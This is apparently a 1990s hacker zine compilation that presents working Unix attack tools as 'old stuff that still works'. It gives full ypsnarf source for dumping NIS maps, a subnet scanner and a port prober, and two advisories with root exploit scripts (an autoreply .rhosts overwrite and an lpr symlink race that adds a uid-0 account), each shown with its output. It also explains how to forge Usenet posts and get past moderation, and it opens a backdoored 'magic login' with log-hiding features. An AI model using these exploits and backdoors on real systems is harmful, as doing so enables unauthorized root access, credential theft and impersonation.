+boxes X'd out with a No. 2 pencil. It did have a keyboard hooked
+up to a printer which served for the monitor. The text was typed
+out and the paper rolled out of the machine in great waves.
+This experience left him wanting more. Somewhere between the
+machine and the mind were all the questions and all the answers.
+  The SenseReal Foundation will supply some of the means. We
+must all work together if we are to succeed. UNITED WE STAND,
+DIVIDED WE FALL. If you wish to participate with The SenseReal
+Foundation you must devote yourself to becoming an Info Agent.
+  As an Info Agent it is your duty to seek Truth and Knowledge
+out wherever it is located. To Learn and to seek to increase
+the Learning of all at The SenseReal Foundation. Different
+people will be needed to help out in different ways.
+  SenseReal's Info Agents are located all around the world and
+are in contact with fellow SenseReal members via any one of
+several SenseReal facilities. The primary establishment and
+headquarters of The SenseReal Foundation is SenseReal's own
+online system:
+       T /-/ E  /-/ /=\ ( /< E R ' S  /\/\ /=\ /\/ S / O /\/
+            >>>::: 1 - 8 0 3 - 7 8 5 - 5 0 8 0 :::<<<
+ 27 Hours Per Day  /14.4 Supra /Home of The SenseReal Foundation
+Also contact via SenseReal's mail drop by writing or sending
+materials to:   TSF              \   Electronic Mail:
+           P.O. BOX 6914         \   Green_Ghost@neonate.atl.ga.us
+      HILTON HEAD, SC 29938-6914 \
+  The Hacker's /\/\ansion is a system like no other. While it is
+not your typical Hackers board it has much Info on Hacking. While
+it is not like any Adult system you've ever seen it has the most
+finest Adult material available anywhere. It is not a Warez board
+but we are definitely Pirates. Because we are (yberpunks. What
+makes the Hacker's Mansion different is our emphasis on quality.
+  Everything that you find at The /-/acker's /\/\ansion is 1ST
+(lass. All the coolest E-zines are pursued here. Phrack, CUD, and
+Thought Virus to name just a few. Of course there is one other
+source for Thought Virus:
+  Send E-Mail to:  ListServ@neonate.atl.ga.us
+In the subject or body of the message write:
+  FAQ ThoughtCriminals
+and you will receive the current issue in your E-Mail box in no
+time.  If you wish to join the Thought Criminals mailing list and
+communicate with your fellow Thought Criminals via E-Mail then
+send another message to: ListServ@neonate.atl.ga.us
+and write the following in the subject or body of the message:
+  Subscribe ThoughtCriminals Your-Address-Here
+or simply: Subscribe ThoughtCriminals
+To mail others on the Thought Criminals mailing list send a message
+to: ThoughtCriminals@neonate.atl.ga.us
+Tell us all. Communication is vital. Our survival may depend on
+it. The SenseReal Foundation is about the allegiance of many
+people, and indeed beings, as our friends from other planets can
+tell you. The EFF inspired us and was a model but we don't have
+the EFF's money so we need YOU. If you are someone who can
+contribute or who believes in The Cause or are just interested
+in Tax Resistance or the Free The Weed movement then you should
+join The SenseReal Foundation today. Contact us through any of
+above channels and become a Freedom Fighter today. Time is of
+the essence.
+::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+
+------------------------------------------------------------------------------
+
+                    ** OLD SHIT THAT STILL WORKS **
+
+                           -  sometimes  -
+
+/*
+ * THIS PROGRAM EXERCISES SECURITY HOLES THAT, WHILE GENERALLY KNOWN IN
+ * THE UNIX SECURITY COMMUNITY, ARE NEVERTHELESS STILL SENSITIVE SINCE
+ * IT REQUIRES SOME BRAINS TO TAKE ADVANTAGE OF THEM.  PLEASE DO NOT
+ * REDISTRIBUTE THIS PROGRAM TO ANYONE YOU DO NOT TRUST COMPLETELY.
+ *
+ * ypsnarf - exercise security holes in yp/nis.
+ *
+ * Based on code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik
+ * (casper@fwi.uva.nl).
+ *
+ * Usage:
+ *  ypsnarf server client
+ *   - to obtain the yp domain name
+ *  ypsnarf server domain mapname
+ *   - to obtain a copy of a yp map
+ *  ypsnarf server domain maplist
+ *   - to obtain a list of yp maps
+ *
+ * In the first case, we lie and pretend to be the host "client", and send
+ * a BOOTPARAMPROC_WHOAMI request to the host "server".  Note that for this
+ * to work, "server" must be running rpc.bootparamd, and "client" must be a
+ * diskless client of (well, it must boot from) "server".
+ *
+ * In the second case, we send a YPPROC_DOMAIN request to the host "server",
+ * asking if it serves domain "domain".  If so, we send YPPROC_FIRST and
+ * YPPROC_NEXT requests (just like "ypcat") to obtain a copy of the yp map
+ * "mapname".  Note that you must specify the full yp map name, you cannot
+ * use the shorthand names provided by "ypcat".
+ *
+ * In the third case, the special map name "maplist" tells ypsnarf to send
+ * a YPPROC_MAPLIST request to the server and get the list of maps in domain
+ * "domain", instead of getting the contents of a map.  If the server has a
+ * map called "maplist" you can't get it.  Oh well.
+ *
+ * Since the callrpc() routine does not make any provision for timeouts, we
+ * artificially impose a timeout of YPSNARF_TIMEOUT1 seconds during the
+ * initial requests, and YPSNARF_TIMEOUT2 seconds during a map transfer.
+ *
+ * This program uses UDP packets, which means there's a chance that things
+ * will get dropped on the floor; it's not a reliable stream like TCP.  In
+ * practice though, this doesn't seem to be a problem.
+ *
+ * To compile:
+ *  cc -o ypsnarf ypsnarf.c -lrpcsvc
+ *
+ * David A. Curry
+ * Purdue University
+ * Engineering Computer Network
+ * Electrical Engineering Building
+ * West Lafayette, IN 47907
+ * davy@ecn.purdue.edu
+ * January, 1991
+ */
+#include <sys/param.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <rpc/rpc.h>
+#include <rpcsvc/bootparam.h>
+#include <rpcsvc/yp_prot.h>
+#include <rpc/pmap_clnt.h>
+#include <sys/time.h>
+#include <signal.h>
+#include <string.h>
+#include <netdb.h>
+#include <stdio.h>
+
+#define BOOTPARAM_MAXDOMAINLEN 32 /* from rpc.bootparamd  */
+#define YPSNARF_TIMEOUT1 15 /* timeout for initial request */
+#define YPSNARF_TIMEOUT2 30 /* timeout during map transfer */
+
+char *pname;    /* program name   */
+
+main(argc, argv)
+char **argv;
+int argc;
+{
+ char *server, *client, *domain, *mapname;
+
+ pname = *argv;
+
+ /*
+  * Process arguments.  This is less than robust, but then
+  * hey, you're supposed to know what you're doing.
+  */
+ switch (argc) {
+ case 3:
+  server = *++argv;
+  client = *++argv;
+
+  get_yp_domain(server, client);
+  exit(0);
+ case 4:
+  server = *++argv;
+  domain = *++argv;
+  mapname = *++argv;
+
+  if (strcmp(mapname, "maplist") == 0)
+   get_yp_maplist(server, domain);
+  else
+   get_yp_map(server, domain, mapname);
+  exit(0);
+ default:
+  fprintf(stderr, "Usage: %s server client         -", pname);
+  fprintf(stderr, "to obtain yp domain name\n");
+  fprintf(stderr, "       %s server domain mapname -", pname);
+  fprintf(stderr, "to obtain contents of yp map\n");
+  exit(1);
+ }
+}
+
+/*
+ * get_yp_domain - figure out the yp domain used between server and client.
+ */
+get_yp_domain(server, client)
+char *server, *client;
+{
+ long hostip;
+ struct hostent *hp;
+ bp_whoami_arg w_arg;
+ bp_whoami_res w_res;
+ extern void timeout();
+ enum clnt_stat errcode;
+
+ /*
+  * Just a sanity check, here.
+  */
+ if ((hp = gethostbyname(server)) == NULL) {
+  fprintf(stderr, "%s: %s: unknown host.\n", pname, server);
+  exit(1);
+ }
+
+ /*
+  * Allow the client to be either an internet address or a
+  * host name.  Copy in the internet address.
+  */
+ if ((hostip = inet_addr(client)) == -1) {
+  if ((hp = gethostbyname(client)) == NULL) {
+   fprintf(stderr, "%s: %s: unknown host.\n", pname,
+    client);
+   exit(1);
+  }
+
+  bcopy(hp->h_addr_list[0],
+        (caddr_t) &w_arg.client_address.bp_address.ip_addr,
+        hp->h_length);
+ }
+ else {
+  bcopy((caddr_t) &hostip,
+        (caddr_t) &w_arg.client_address.bp_address.ip_addr,
+        sizeof(ip_addr_t));
+ }
+
+ w_arg.client_address.address_type = IP_ADDR_TYPE;
+ bzero((caddr_t) &w_res, sizeof(bp_whoami_res));
+
+ /*
+  * Send a BOOTPARAMPROC_WHOAMI request to the server.  This will
+  * give us the yp domain in the response, IFF client boots from
+  * the server.
+  */
+ signal(SIGALRM, timeout);
+ alarm(YPSNARF_TIMEOUT1);
+
+ errcode = callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS,
+     BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &w_arg,
+     xdr_bp_whoami_res, &w_res);
+
+ alarm(0);
+
+ if (errcode != RPC_SUCCESS)
+  print_rpc_err(errcode);
+
+ /*
+  * Print the domain name.
+  */
+ printf("%.*s", BOOTPARAM_MAXDOMAINLEN, w_res.domain_name);
+
+ /*
+  * The maximum domain name length is 255 characters, but the
+  * rpc.bootparamd program truncates anything over 32 chars.
+  */
+ if (strlen(w_res.domain_name) >= BOOTPARAM_MAXDOMAINLEN)
+  printf(" (truncated?)");
+
+ /*
+  * Put out the client name, if they didn't know it.
+  */
+ if (hostip != -1)
+  printf(" (client name = %s)", w_res.client_name);
+
+ putchar('\n');
+}
+
+/*
+ * get_yp_map - get the yp map "mapname" from yp domain "domain" from server.
+ */
+get_yp_map(server, domain, mapname)
+char *server, *domain, *mapname;
+{
+ char *reqp;
+ bool_t yesno;
+ u_long calltype;
+ bool (*xdr_proc)();
+ extern void timeout();
+ enum clnt_stat errcode;
+ struct ypreq_key keyreq;
+ struct ypreq_nokey nokeyreq;
+ struct ypresp_key_val answer;
+
+ /*
+  * This code isn't needed; the next call will give the same
+  * error message if there's no yp server there.
+  */
+#ifdef not_necessary
+ /*
+  * "Ping" the yp server and see if it's there.
+  */
+ signal(SIGALRM, timeout);
+ alarm(YPSNARF_TIMEOUT1);
+
+ errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
+     xdr_void, 0);
+
+ alarm(0);
+
+ if (errcode != RPC_SUCCESS)
+  print_rpc_err(errcode);
+#endif
+
+ /*
+  * Figure out whether server serves the yp domain we want.
+  */
+ signal(SIGALRM, timeout);
+ alarm(YPSNARF_TIMEOUT1);
+
+ errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
+     xdr_wrapstring, (caddr_t) &domain, xdr_bool,
+     (caddr_t) &yesno);
+
+ alarm(0);
+
+ if (errcode != RPC_SUCCESS)
+  print_rpc_err(errcode);
+
+ /*
+  * Nope...
+  */
+ if (yesno == FALSE) {
+  fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
+   server, domain);
+  exit(1);
+ }
+
+ /*
+  * Now we just read entry after entry...  The first entry we
+  * get with a nokey request.
+  */
+ keyreq.domain = nokeyreq.domain = domain;
+ keyreq.map = nokeyreq.map = mapname;
+ reqp = (caddr_t) &nokeyreq;
+ keyreq.keydat.dptr = NULL;
+
+ answer.status = TRUE;
+ calltype = YPPROC_FIRST;
+ xdr_proc = xdr_ypreq_nokey;
+
+ while (answer.status == TRUE) {
+  bzero((caddr_t) &answer, sizeof(struct ypresp_key_val));
+
+  signal(SIGALRM, timeout);
+  alarm(YPSNARF_TIMEOUT2);
+
+  errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc,
+      reqp, xdr_ypresp_key_val, &answer);
+
+  alarm(0);
+
+  if (errcode != RPC_SUCCESS)
+   print_rpc_err(errcode);
+
+  /*
+   * Got something; print it.
+   */
+  if (answer.status == TRUE) {
+   printf("%.*s\n", answer.valdat.dsize,
+          answer.valdat.dptr);
+  }
+
+  /*
+   * Now we're requesting the next item, so have to
+   * send back the current key.
+   */
+  calltype = YPPROC_NEXT;
+  reqp = (caddr_t) &keyreq;
+  xdr_proc = xdr_ypreq_key;
+
+  if (keyreq.keydat.dptr)
+   free(keyreq.keydat.dptr);
+
+  keyreq.keydat = answer.keydat;
+
+  if (answer.valdat.dptr)
+   free(answer.valdat.dptr);
+ }
+}
+
+/*
+ * get_yp_maplist - get the yp map list for  yp domain "domain" from server.
+ */
+get_yp_maplist(server, domain)
+char *server, *domain;
+{
+ bool_t yesno;
+ extern void timeout();
+ struct ypmaplist *mpl;
+ enum clnt_stat errcode;
+ struct ypresp_maplist maplist;
+
+ /*
+  * This code isn't needed; the next call will give the same
+  * error message if there's no yp server there.
+  */
+#ifdef not_necessary
+ /*
+  * "Ping" the yp server and see if it's there.
+  */
+ signal(SIGALRM, timeout);
+ alarm(YPSNARF_TIMEOUT1);
+
+ errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
+     xdr_void, 0);
+
+ alarm(0);
+
+ if (errcode != RPC_SUCCESS)
+  print_rpc_err(errcode);
+#endif
+
+ /*
+  * Figure out whether server serves the yp domain we want.
+  */
+ signal(SIGALRM, timeout);
+ alarm(YPSNARF_TIMEOUT1);
+
+ errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
+     xdr_wrapstring, (caddr_t) &domain, xdr_bool,
+     (caddr_t) &yesno);
+
+ alarm(0);
+
+ if (errcode != RPC_SUCCESS)
+  print_rpc_err(errcode);
+
+ /*
+  * Nope...
+  */
+ if (yesno == FALSE) {
+  fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
+   server, domain);
+  exit(1);
+ }
+
+ maplist.list = (struct ypmaplist *) NULL;
+
+ /*
+  * Now ask for the list.
+  */
+ signal(SIGALRM, timeout);
+ alarm(YPSNARF_TIMEOUT1);
+
+ errcode = callrpc(server, YPPROG, YPVERS, YPPROC_MAPLIST,
+     xdr_wrapstring, (caddr_t) &domain,
+     xdr_ypresp_maplist, &maplist);
+
+ alarm(0);
+
+ if (errcode != RPC_SUCCESS)
+  print_rpc_err(errcode);
+
+ if (maplist.status != YP_TRUE) {
+  fprintf(stderr, "%s: cannot get map list: %s\n", pname,
+   yperr_string(ypprot_err(maplist.status)));
+  exit(1);
+ }
+
+ /*
+  * Print out the list.
+  */
+ for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next)
+  printf("%s\n", mpl->ypml_name);
+}
+
+/*
+ * print_rpc_err - print an rpc error and exit.
+ */
+print_rpc_err(errcode)
+enum clnt_stat errcode;
+{
+ fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode));
+ exit(1);
+}
+
+/*
+ * timeout - print a timeout and exit.
+ */
+void timeout()
+{
+ fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname);
+ exit(1);
+}
+
+------------------------------------------------------------------------------
+
+#!/bin/perl -s
+#
+#   Scan a subnet for valid hosts; if given hostname, will look at the
+# 255 possible hosts on that net.  Report if host is running rexd or
+# ypserv.
+#
+#  Usage:  scan n.n.n.n
+
+# mine, by default
+$default = "130.80.26";
+
+$| = 1;
+
+if ($v) { $verbose = 1; }
+
+if ($#ARGV == -1) { $root = $default; }
+else { $root = $ARGV[0]; }
+
+# ip address
+if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
+        ($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
+        ($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
+        $root = "$one.$two.$three";
+        if ($root eq "..") { die "Can't figure out what to scan...\n"; }
+        }
+
+print "Subnet $root:\n" if $verbose;
+for $i (01..255) {
+        print "Trying $root.$i\t=> " if $verbose;
+        &resolve("$root.$i");
+        }
+
+#
+#  Do the work
+#
+sub resolve {
+
+local($name) = @_;
+
+# ip address
+if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
+        ($a,$b,$c,$d) = split(/\./, $name);
+        @ip = ($a,$b,$c,$d);
+        ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
+        }
+else {
+        ($name, $aliases, $type, $len, @ip) = gethostbyname($name);
+        ($a,$b,$c,$d) = unpack('C4',$ip[0]);
+        }
+
+if ($name && @ip) {
+        print "$a.$b.$c.$d\t$name\n";
+        system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R
+unning ypserv.\"\nfi\nfi");
+        }
+else { print "unable to resolve address\n" if $verbose; }
+
+}
+
+sub AF_INET {2;}
+
+------------------------------------------------------------------------------
+
+/*
+ * probe_tcp_ports
+ */
+
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <stdio.h>
+#include <ctype.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netdb.h>
+
+#define RETURN_ERR -1
+#define RETURN_FAIL 0
+#define RETURN_SUCCESS 1
+
+int             Debug;
+int             Hack;
+int             Verbose;
+
+main(ArgC, ArgV)
+ int             ArgC;
+ char          **ArgV;
+{
+ int             Index;
+ int             SubIndex;
+
+ for (Index = 1; (Index < ArgC) && (ArgV[Index][0] == '-'); Index++)
+     for (SubIndex = 1; ArgV[Index][SubIndex]; SubIndex++)
+  switch (ArgV[Index][SubIndex])
+  {
+  case 'd':
+   Debug++;
+   break;
+  case 'h':
+   Hack++;
+   break;
+  case 'v':
+   Verbose++;
+   break;
+  default:
+   (void) fprintf(stderr,
+  "Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n");
+   exit(1);
+  }
+
+ for (; Index < ArgC; Index++)
+  (void) Probe_TCP_Ports(ArgV[Index]);
+ exit(0);
+}
+
+Probe_TCP_Ports(Name)
+ char           *Name;
+{
+ unsigned        Port;
+ char           *Host;
+ struct hostent *HostEntryPointer;
+ struct sockaddr_in SocketInetAddr;
+ struct hostent  TargetHost;
+ struct in_addr  TargetHostAddr;
+ char           *AddressList[1];
+ char            NameBuffer[128];
+
+ extern int      inet_addr();
+ extern char    *rindex();
+
+ if (Name == NULL)
+  return (RETURN_FAIL);
+ Host = Name;
+ if (Host == NULL)
+  return (RETURN_FAIL);
+ HostEntryPointer = gethostbyname(Host);
+ if (HostEntryPointer == NULL)
+  {
+  TargetHostAddr.s_addr = inet_addr(Host);
+  if (TargetHostAddr.s_addr == -1)
+   {
+   (void) printf("unknown host: %s\n", Host);
+   return (RETURN_FAIL);
+   }
+  (void) strcpy(NameBuffer, Host);
+  TargetHost.h_name = NameBuffer;
+  TargetHost.h_addr_list = AddressList, TargetHost.h_addr =
+   (char *) &TargetHostAddr;
+  TargetHost.h_length = sizeof(struct in_addr);
+  TargetHost.h_addrtype = AF_INET;
+  TargetHost.h_aliases = 0;
+  HostEntryPointer = &TargetHost;
+  }
+ SocketInetAddr.sin_family = HostEntryPointer->h_addrtype;
+ bcopy(HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr,
+  HostEntryPointer->h_length);
+
+
+ for (Port = 1; Port < 65536; Port++)
+  (void) Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr);
+ return (RETURN_SUCCESS);
+}
+
+Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr)
+ unsigned        Port;
+ struct hostent *HostEntryPointer;
+ struct sockaddr_in SocketInetAddr;
+{
+ char            Buffer[BUFSIZ];
+ int             SocketDescriptor;
+ struct servent *ServiceEntryPointer;
+
+
+ SocketInetAddr.sin_port = Port;
+ SocketDescriptor = socket(AF_INET, SOCK_STREAM, 6);
+ if (SocketDescriptor < 0)
+  {
+  perror("socket");
+  return (RETURN_ERR);
+  }
+ if (Verbose)
+  {
+  (void) printf("Host %s, Port %d ", HostEntryPointer->h_name,
+         Port);
+  if ((ServiceEntryPointer = getservbyport(Port, "tcp")) !=
+      (struct servent *) NULL)
+   (void) printf(" (\"%s\" service) ",
+          ServiceEntryPointer->s_name);
+  (void) printf("connection ... ");
+  (void) fflush(stdout);
+  }
+ if (connect(SocketDescriptor, (char *) &SocketInetAddr,
+      sizeof(SocketInetAddr)) < 0)
+  {
+  if (Verbose)
+   (void) printf("NOT open.\n");
+  if (Debug)
+   perror("connect");
+  }
+ else
+  {
+  if (!Verbose)
+   {
+   (void) printf("Host %s, Port %d ",
+          HostEntryPointer->h_name, Port);
+   if ((ServiceEntryPointer = getservbyport(Port,"tcp")) !=
+       (struct servent *) NULL)
+    (void) printf(" (\"%s\" service) ",
+           ServiceEntryPointer->s_name);
+   (void) printf("connection ... ");
+   (void) fflush(stdout);
+   }
+  (void) printf("open.\n");
+  if (Hack)
+   {
+   (void) sprintf(Buffer, "/usr/ucb/telnet %s %d",
+           HostEntryPointer->h_name, Port);
+   (void) system(Buffer);
+   }
+  }
+
+ (void) close(SocketDescriptor);
+ return (RETURN_SUCCESS);
+}
+
+------------------------------------------------------------------------------
+
+[8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991
+
+PROGRAM:
+
+ autoreply(1) (/usr/local/bin/autoreply)
+   Supplied with the Elm Mail System
+
+VULNERABLE OS's:
+
+ Any system with a standard installation of The Elm Mail System.
+ All versions are believed to have this vulnerability.
+
+DESCRIPTION:
+
+ autoreply(1) can be used to create root owned files, with mode
+ 666.  It can also overwrite any file with semi user-controlled
+ data.
+
+IMPACT:
+
+ Any user with access to autoreply(1) can alter system files and
+ thus become root.
+
+REPEAT BY:
+
+ This example demonstrates how to become root on most affected
+ machines by modifying root's .rhosts file.  Please do not do
+ this unless you have permission.
+
+ Create the following script, 'fixrhosts':
+
+8<--------------------------- cut here ----------------------------
+#!/bin/sh
+#
+# fixrhosts rhosts-file user machine
+#
+if [ $# -ne 3 ]; then
+ echo "Usage: `basename $0` rhosts-file user machine"
+ exit 1
+fi
+RHOSTS="$1"
+USERNAME="$2"
+MACHINE="$3"
+cd $HOME
+echo x > "a
+$MACHINE $USERNAME
+b"
+umask 022
+autoreply "a
+$MACHINE $USERNAME
+b"
+cat > /tmp/.rhosts.sh.$$ << 'EOF'
+ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
+exec autoreply off
+exit 0
+EOF
+/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
+rm -f /tmp/.rhosts.sh.$$ "a
+$MACHINE $USERNAME
+b"
+exit 0
+8<--------------------------- cut here ----------------------------
+
+ (Lines marked with > represent user input)
+
+> % id
+ uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
+> % ./fixrhosts ~root/.rhosts 8lgm localhost
+ You've been added to the autoreply system.
+ You've been removed from the autoreply table.
+> % rsh localhost -l root csh -i
+ Warning: no access to tty.
+ Thus no job control in this shell.
+ #
+
+
+FIX:
+
+ 1. Disable autoreply.
+ 2. Wait for a patch from the Elm maintainers.
+
+------------------------------------------------------------------------------
+
+[8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991
+
+PROGRAM:
+
+ lpr(1)  (/usr/ucb/lpr or /usr/bin/lpr)
+
+VULNERABLE OS's:
+
+ SunOS 4.1.1 or earlier
+ BSD 4.3
+ BSD NET/2 Derived Systems
+ A/UX 2.0.1
+
+ Most systems supporting the BSD LP subsystem
+
+
+DESCRIPTION:
+
+ lpr(1) can be used to overwrite or create (and become owner of)
+ any file on the system.  lpr -s allows users to create symbolic
+ links in lpd's spool directory (typically /var/spool/lpd).
+ After 1000 invocations of lpr, lpr will reuse the filename in
+ the spool directory, and follow the link previously installed.
+ It will thus overwrite/create any file that this link points too.
+
+IMPACT:
+
+ Any user with access to lpr(1) can alter system files and thus
+ become root.
+
+REPEAT BY:
+
+ This example demonstrates how to become root on most affected
+ machines by modifying /etc/passwd and /etc/group.  Please do
+ not do this unless you have permission.
+
+ Create the following script, 'lprcp':
+
+8<--------------------------- cut here ----------------------------
+#!/bin/csh -f
+#
+# Usage: lprcp from-file to-file
+#
+
+if ($#argv != 2) then
+ echo Usage: lprcp from-file to-file
+ exit 1
+endif
+
+# This link stuff allows us to overwrite unreadable files,
+# should we want to.
+echo x > /tmp/.tmp.$$
+lpr -q -s /tmp/.tmp.$$
+rm -f /tmp/.tmp.$$  # lpr's accepted it, point it
+ln -s $2 /tmp/.tmp.$$  # to where we really want
+
+@ s = 0
+while ( $s != 999)  # loop 999 times
+ lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
+ @ s++
+ if ( $s % 10 == 0 ) echo -n .
+end
+lpr $1    # incoming file
+    # user becomes owner
+rm -f /tmp/.tmp.$$
+exit 0
+8<--------------------------- cut here ----------------------------
+
+ (Lines marked with > represent user input)
+
+Make copies of /etc/passwd and /etc/group, and modify them:
+> % id
+ uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
+> % cp /etc/passwd /tmp/passwd
+> % ex /tmp/passwd
+ /tmp/passwd: unmodified: line 42
+> :a
+> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
+> .
+> :wq
+ /tmp/passwd: 43 lines, 2188 characters.
+> % cp /etc/group /tmp
+> % ex /tmp/group
+ /tmp/group: unmodified: line 49
+> :/wheel
+ wheel:*:0:root,operator
+> :c
+> wheel:*:0:root,operator,8lgm
+> .
+> :wq
+ /tmp/group: 49 lines, 944 characters.
+
+Install our new files:
+> % ./lprcp /tmp/group /etc/group
+ ................................................................
+ ...................................
+ lpr: cannot rename /var/spool/lpd/cfA060testnode
+> % ./lprcp /tmp/passwd /etc/passwd
+ .................................................................
+ ..................................
+ lpr: cannot rename /var/spool/lpd/cfA061testnode
+
+Check it worked:
+> % ls -l /etc/passwd /etc/group
+ -rw-r--r--    1 8lgm          944 Mar  3 19:56 /etc/group
+ -rw-r--r--    1 8lgm         2188 Mar  3 19:59 /etc/passwd
+> % head -1 /etc/group
+ wheel:*:0:root,operator,8lgm
+> % grep '^8lgmroot' /etc/passwd
+ 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
+
+Become root and tidy up:
+> % su 8lgmroot
+ # chown root /etc/passwd /etc/group
+ # rm -f /tmp/passwd /tmp/group
+ #
+
+FIX:
+
+ 1. Contact your vendor for a fix.
+ 2. In the meantime, apply the following patch, derived from
+    BSD NET/2 source, which will correct the flaw on most
+    affected systems:
+
+------------------------------------------------------------------------------
+
+          Anonymous netnews without "anonymous" remailers
+
+Save any news article to a file.  We'll call it "hak" in this example.
+Edit hak, and remove any header lines of the form
+
+ From some!random!path!user   (note: "From ", not "From: " !!)
+ Article:
+ Lines:
+
+Shorten the Path: header down to its LAST two or three "bangized" components.
+This is to make the article look like it was posted from where it really was
+posted, and originally hit the net at or near the host you send it to.  Or
+you can construct a completely new Path: line to reflect your assumed alias.
+
+Make some change to the Message-ID: field, that isn't likely to be
+duplicated anywhere.  This is usually best done by adding a couple of
+random characters to the part before the @, since news posting programs
+generally use a fixed-length field to generate these IDs.
+
+Change the other headers to say what you like -- From:, Newsgroups:,
+Sender:, etc.  Replace the original message text with your message.
+If you are posting to a moderated group, remember to put in an Approved:
+header to bypass the moderation mechanism.
+
+Write out the changed file, and send it to your favorite NNTP server that
+permits transfers via the IHAVE command, using the following script:
+
+=======================
+#! /bin/sh
+## Post an article via IHAVE.
+## args: filename server
+
+if test "$2" = "" ; then
+  echo usage: $0 filename server
+  exit 1
+fi
+if test ! -f $1 ; then
+  echo $1: not found
+  exit 1
+fi
+
+# suck msg-id out of headers, keep the brackets
+msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
+  sed 's/.*-[Ii][Dd]: //'`
+echo $msgid
+
+( sleep 5
+  echo IHAVE $msgid
+  sleep 3
+  cat $1
+  sleep 1
+  echo "."
+  sleep 1
+  echo QUIT ) | telnet $2 119
+=======================
+
+If your article doesn't appear in a day or two, try a different server.
+They are easy to find.  Here's a script that will break a large file
+full of saved netnews into a list of hosts to try.  Edit the output
+of this if you want, to remove obvious peoples' names and other trash.
+
+=======================
+#! /bin/sh
+FGV='fgrep -i -v'
+egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
+/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
+=======================
+
+Once you have your host list, feed it to the following script.
+
+=======================
+#! /bin/sh
+
+while read xx ; do
+if test "$xx" = "" ; then continue;
+fi
+echo === $xx
+( echo open $xx 119
+  sleep 5
+  echo ihave k00l@x.edu
+  sleep 4
+  echo .
+  echo quit
+  sleep 1
+  echo quit
+) | telnet
+done
+=======================
+
+If the above script is called "findem" and you're using csh, you should do
+
+ findem < list >& outfile
+
+so that ALL output from telnet is captured.  This takes a long time, but when
+it finishes, edit "outfile" and look for occurrences of "335".  These mark
+answers from servers that might be willing to accept an article.  This isn't a
+completely reliable indication, since some servers respond with acceptance and
+later drop articles.  Try a given server with a slightly modified repeat of
+someone else's message, and see if it eventually appears.
+
+You will notice other servers that don't necessarily take an IHAVE, but
+say "posting ok".  You can probably do regular POSTS through these, but they
+will add an "NNTP-Posting-Host: " header containing the machine YOU came from.
+
+------------------------------------------------------------------------------
+
+Magic Login - Written by Data King - 7 July 1994
+
+PLEASE NOTE:-
+
+     This program code is released  on the understanding  that neither the
+     author or Phrack  Magazine suggest that you implement this on **ANY**
+     system that you are not authorized to do so. The author provides this
+     implementation of a "Magic"  login as a learning exercise in security
+     programming.
+
+Sorry for the disclaimer readers but I was advised by the AFP (Australian
+Federal Police) that if I ever released this code they would bust me for
+aiding and abetting. I am releasing it anyway as I believe in the right of
+people to KNOW, but not necessarily to DO.
+
+As always I can be emailed at dking@suburbia.apana.org.au
+(Please note:- I have a NEW pgp signature.)
+
+INTRODUCTION
+~~~~~~~~~~~~
+Briefly I am going to explain what a "Magic" login is and some of the steps you
+need to go through to receive the desired result. At the end of this article is
+a diff that can be applied to the shadow-3.2.2-linux archive to implement some
+of these ideas.
+
+EXPLANATION
+~~~~~~~~~~~
+A "Magic" login is a modified login program that allows the user to login
+without knowing the correct password for the account they are logging into.
+
+This is a very simple programming exercise and can be done by almost anyone, but
+a really effective "Magic" login program will do much more than this. The
+features of the supplied "Magic" login are:
+
+     - Will login to any valid account as long as you know the Magic password.
+
+     - Hides you in UTMP
+[B
+     - Does not Log to WTMP
+
+     - Allows Root Login from NON authorized Terminals
+
+     - Preserves the Lastlogin information (ie Keeps it as though you had never
+       logged in with the magic password)
+
+     - Produces a binary that is exactly the same length as the original binary.
+
+IMPLEMENTATION
+~~~~~~~~~~~~~~
+I am not going to go into great detail here on how to write such a system as
+this. The code is very simple and it contains plenty of comments, so just look
+there for ideas.
+
+For this system to have less chance of being detected you need to do several
+things.
+
+First select a "Magic" password that is not easily identifiable by stringing the
+binary. This is why in the example I have used the word "CONSOLE", this word
+already appears several times in the binary so detection of one more is
+unlikely.
+
